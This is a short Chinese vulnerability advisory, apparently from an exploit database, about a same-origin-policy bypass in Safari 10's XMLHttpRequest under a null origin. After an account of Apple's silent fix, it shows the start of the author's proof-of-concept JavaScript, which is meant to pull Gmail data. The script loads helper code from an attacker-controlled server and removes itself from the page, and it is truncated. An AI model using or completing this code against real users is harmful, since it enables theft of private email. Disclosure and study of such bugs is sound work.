safari10跨域漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

safari 10的XMLHttpRequest在null域下可以随意发起跨域请求和设置http_header 我交到苹果的bugreport,并给apple发邮件后,他们自己悄悄把漏洞修了,连个邮件都没给我发,所以我决定公开poc 这是我在漏洞未修复前截的图: ![](https://images.seebug.org/contribute/b988c842-3314-4803-bcd5-57dd36dfd741-w331s) ![](https://images.seebug.org/contribute/c19627aa-3691-40ff-8fc9-d07b842f70c2-w331s) ![](https://images.seebug.org/contribute/bb2e73c1-5330-4322-802b-8eb8781d2370-w331s) ![](https://images.seebug.org/contribute/deb1c7cf-27bf-410e-a8f9-afd83cef7610-w331s) ![](https://images.seebug.org/contribute/70b875da-4483-4042-ae41-2ad5703e1169-w331s) 这个漏洞可以造成同源策略绕过,随便跨域,这是我写的获取gmail数据的代码: ```html <script id='jquery' src='http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js'></script> <script id='test'> var server_address = 'http://127.0.0.1:8000/static/csrf_Wcn6h/' function deleteSelf(){ let test = document.getElementById('test'); test.parentNode.removeChild(test); } function getPoc(src,id){//src:poc地址id:append的<script>的id,用于移除改元素 let head =...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息